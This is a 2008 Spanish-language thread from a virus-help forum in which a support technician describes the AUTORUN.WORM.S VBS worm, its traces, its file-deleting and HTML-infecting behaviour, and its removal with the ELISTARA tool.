El forero no usa McAfee y es logico que no lo detectara, pero nuestros clientes en España todos usan McAfee, asi que no es fácil que tuvieran este virua, en cambio en el log del HJT aparecen claves con el prefijo correspondiente a su empresa o usuario, en los servicios, despues de un DOCUMENTS AND SETTINGS y antes de WINDOWS\SYSTEM32 , igual que en el caso de este Tema, si bien aqui era lo correspondiente al ordenador en cuestion, y por ello indicaba administrador.COLCQ... , lo cual entendemos que no es del mismo virus de pendrive, el de VBS, sino otro, por lo que pudiera ser que nuestro forero tuviera dos virus en lugar de uno solo !



Y cuidado, hemos visto que este VBS crea un fichero con la fecha de infeccion en C:\windows\ok.ini lo cual tiene muy mala pinta, pues acostumbran a hacerlo los que tienen un payload a x dias de la fecha de infeccion ...



Ello es a título de informacion, ya que tras haberlo formateado no les afecta, pero como que donde ha habido, siempre queda... además asi queda para el historico.



Al nuevo infectado con esta historia de cambio de ruta, le aconsejamos que acceda al ultimo punto de restauracion disponible antes de la infeccion, pues vemos que sea lo que sea, deja muy tocado el ordenador, y lo mejor es volver atrás .



El otro virus, de VBS, AUTORUN.WORM.S ya lo hemos implementado para ser eliminado en el ELISTARA 16.08 de hoy, que estará disponible a partir de las 19 h GMT para pruebas de evaluacion en el foro de zonavirus.



saludos



ms, 14-04-2008

Avatar de Usuario
msc hotline sat
Mensajes: 93500
Registrado: 09 Mar 2004, 20:39
Ubicación: BARCELONA (ESPAÑA)
Contactar:

Re: Virus daño servidor (TERMINADO)

Mensaje por msc hotline sat » 14 Abr 2008, 16:34

Aparte de la eliminacion de claves, ficheros y demas, que es lo que hace el ELISTARA, cabe indicar que este AUTORUN.WORM.S, tiene otras intenciones, como borrar los ficheros mpg, rmnb, avi, rm e infectar la cabecera de htm, html y asp, aparte de modificar de otra forma los vbs que encuentre, vaya joya !



Ya vimos que su código prometía, pero vamos, que se ha lucido su coder !



Menos mal que el McAfee lo controla, pero no lo detectan actualmente, entre otros, el Avast, el Clam AV, el Dr Web, el Fortinet, el Ikarus, el NOD32, Panda, Sophos y el VBA32



saludos



ms, 14-04-2008

Cerrado

Volver a “Foro Virus - Cuentanos tu problema”